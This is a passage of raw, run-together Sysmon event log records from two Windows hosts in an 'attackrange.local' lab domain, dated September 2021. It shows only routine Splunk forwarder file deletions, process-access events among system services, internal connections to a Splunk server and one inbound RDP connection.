09:14:35.178{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2561F44C6DF18E5FD7493036B0F09390,SHA256=E36D6CF9DD2B499AEBCE56D8BDCE0D1093F96663FE29055C9920DF22F1DF0249,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050698Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:35.178{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8238ACF4A5D31B56137C7B06A9712481,SHA256=4013A84BD345A86394A45C264A42DADEC0BC32EF6A78BF0B6F588843945086D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050705Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:36.897{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE3783F03D7F3EE8D4B94DBED557BDE3,SHA256=A8036FB9B2F8F2F5019CCE467660B4494CD193E86551DE8C06AEB2735B67DC5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979417Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:32.838{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59417-false10.0.1.12-8000- 23542300x8000000000000000979416Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:36.056{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F5C12713EC900C2B837A13AA0A96166,SHA256=A57E320DF68BA9D6FE5757D76372A7359F66990012E3F40D38127AC4B1A8E211,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050704Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:36.715{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050703Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:36.379{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4311MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979431Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B7D-6151-DB79-00000000FD01}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979430Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979429Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979428Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979427Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979426Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979425Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979424Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979423Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979422Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979421Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8B7D-6151-DB79-00000000FD01}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979420Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.431{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B7D-6151-DB79-00000000FD01}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979419Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.416{69CF5F33-8B7D-6151-DB79-00000000FD01}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979418Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:37.275{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1CF12900ADB815AC64BF77389CFA9D2,SHA256=6EC3533865BC6D424E5500B60DE3A09783EDAC0CA335361F78BF0DD8EE2B8A15,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050706Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:34.769{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53405-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000979434Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:38.290{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=000A28BE39EE120EC5ECFE4C06CD46EE,SHA256=189255F0EBFE0DC10E8796D4B37641885751E180258F2443070321869AACEFCA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050709Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:38.945{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001050708Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:36.385{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53406-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001050707Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:38.014{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AA3C9E6E70B127AF696FC05E63445BC,SHA256=DDCF6255F116E59A4A036F10C07183A09F7EA8CEC6DAA5795835468BC9DB299D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979433Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:38.087{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4598C1AF72C014E41A50541CF202785E,SHA256=B15D1013CBDAE086DC61428E6604DBF3B6622309C8A1A2F4D2BFC729AEDBD0BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979432Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:38.087{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9BCD7E91C1251EEBD40CC5096E98922,SHA256=2C8795E0CEE5FBE46BC079CA64668A6802F7CA697E9B1CE9666CD9E05030BE34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979436Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:35.176{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56509-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979435Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:39.290{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8929F286633E2ACCA507B43E8F65B9A,SHA256=01A25163125E07E8FBEEFB401ADAF568975280507C6392834B15C9C3F79ADA37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050711Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:39.313{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E726847D3A283EB248A28A841152640C,SHA256=D995C01740370CE88D83420A5CE347E6E5B7097CD7B051E141D19F76BA0B07FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050710Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:39.113{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B5D38307ABB85DEE12EBACC8CE52404,SHA256=49EC8594B936FB9E7CB240DE24132E0A7599410376BD57BBF164472BC1972556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979437Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:40.306{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5066BA9030EDAE2A5DB2090C27792CD0,SHA256=FBB2D3A9B1559815628B38A9A6ADE1C07FC8167928F9C75649FE6BC689CE651A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050712Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:40.143{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57E1B41256231732C04B0163AFF1A856,SHA256=1D4F103376D6DDD81F88CDA814ACE3DCD259FEC47AEB980B29E25E0E813D954E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979439Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:38.791{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59418-false10.0.1.12-8000- 23542300x8000000000000000979438Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:41.540{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DB0526F924137FCAF987AB5320EDBBF,SHA256=1819ABA8BD68C347EB64018BD7F4E8A86674EE02036AFCACFD5B5CB5E5A39AFA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050714Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:39.904{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53407-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050713Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:41.158{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=097CDC7EC905A40277392178353218A8,SHA256=9391AAAD04EDB37424624F56C9F2E8ADB4ECB3FCE8BFA5685F0F3704E2AE2825,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979442Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:42.681{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EEF3CC98F528C12991CC7C2D9505095,SHA256=6180BF83223409FC3E011A91F19AB9D61D338BA86D6659BC27A2387FEDDC8477,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979441Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:42.681{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4598C1AF72C014E41A50541CF202785E,SHA256=B15D1013CBDAE086DC61428E6604DBF3B6622309C8A1A2F4D2BFC729AEDBD0BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050715Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 